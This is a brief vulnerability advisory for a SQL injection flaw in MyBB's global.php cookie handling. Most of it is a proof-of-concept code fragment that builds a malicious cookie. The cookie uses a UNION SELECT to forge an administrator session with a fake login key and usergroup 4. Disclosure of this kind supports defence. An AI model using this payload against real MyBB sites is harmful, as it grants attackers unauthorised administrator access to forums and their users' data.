MyBB Globa.PHP Cookie Data SQL Injection Vulnerability

MyBB Globa.PHP Cookie Data SQL Injection Vulnerability

An exploit is not required.

The following proof of concept example is available:
string expcookie="imei'" //garbrage field that actually is not an uid + an inject sign +" union select '1' as uid," //return no admin union our sniffed admin +" '','','','xxx'as loginkey ,"//we have not any info! so null them; only login key cheked that we fill with xxx +" '','','','',"//null fields befor usergroup +" 4 as usergroup";// ok! our sniffed admin is an admin : D !! for (int i=0;i< 49;i++) expcookie+=",''"; //null all of other fields!expcookie+="-- imei" // remark rest of SQL +"_xxx" ;